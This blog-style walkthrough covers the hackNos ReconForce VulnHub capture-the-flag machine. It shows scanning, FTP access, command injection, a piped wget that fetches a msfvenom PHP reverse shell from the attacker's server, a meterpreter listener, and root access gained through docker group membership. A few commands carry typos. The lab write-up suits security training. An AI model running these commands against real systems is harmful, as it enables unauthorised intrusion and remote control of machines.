hackNos ReconForce walkthrough vulnhub CTF

hackNos Reconforce Walkthrough Vulhub CTF Machine is create by Rahul Gehlaut

Download hackNos: ReconForce VM here

Today we are solving hackNos ReconForce is Created by Rahul Gehlaut

Walkthrough

Our First Step is a network Scanning Finding our target IP address Today I use netdiscover for All network scanning

netdiscover
hackNos ReconForce walkthrough

After finding our target IP address Our next step is to scan our target with Nmap.

nmap -A 192.168.1.6
hackNos ReconForce walkthrough

Enumeration

we see the Nmap scan target machine three-port are open 21/ftp, 22/ssh, and 80/http service and the target is allowed, anonymous user login

FTP login

I go to ftp login and connecting with ftp username and ftp password and ls command to see target directory and the target directory is empty and we see the target ftp banner Security@hackNos

ftp 192.168.1.6
  • username: ftp
  • password; ftp

I try the banner for Troubleshoot login page password field and try command username admin and us successful login with 5ecure page.

http://192.168.1.6
hackNos ReconForce walkthrough
  • web username: admin
  • web pass: Security@hackNos
hackNos ReconForce walkthrough

After trying many attempts our target is vulnerable command injection I run the ID command and before our command using ( | pipe ) and hit enter.

id
hackNos ReconForce walkthrough

our browser is show response next page and we see the target uid and guid.

hackNos ReconForce walkthrough
Msfvenom

Without wasting our time I go to create a php reverse shell with msfvenom raw formate and copy a shellcode and paste shell.php file.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.19 lport=4545 -f raw
hackNos ReconForce walkthrough

Now downloading our shell payload target machine I start our python local server port 99 downloads the payload wget command

|wget http://192.168.1.19:99/shell.php
hackNos ReconForce walkthrough

before executing our payload I start our msfconsole multi handler payload listener specified lport and lhost

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4545
set lhost 0.0.0.0
run
hackNos ReconForce walkthrough

Executing our payload with using pip and type php our shell name

|php shell.php
hackNos ReconForce walkthrough

we see the msfconsole window we got a reverse connection target machine now I run the shell command and we see the blank shell now import python3 for proper shell

python -c 'import pty;pty.spwan("/bin/bash")'
id
hackNos ReconForce walkthrough

After enumeration target directory I go to target home directory and see a user recon I am trying to changing our current user shell with su switch user command and try the password 5ecure login page

cd /home
su recon

After loning with recon user I run the ID command and see the user group name we see the user recon with docker group.

id
cat user.txt
hackNos ReconForce walkthrough

Privilege Escalation

I install virtual image ubuntu with docker

docker run ubuntu

After installing our ubuntu image I run the command docker run ( -it interactive mode ) and -v ( verbose ) and our mounting point or our image file name

docker run-it -v /root:/mnt ubuntu
hackNos ReconForce walkthrough

we see the root shell docker virtual image ubuntu and I changing our directory mounting point /mnt and type ls command to see all file /mnt directory we see the target root directory and our last root flag cat command to open the file

cd /mnt
ls
cat root.txt
hackNos ReconForce walkthrough
Five86-1 Walkthrough Vulnhub CTF read here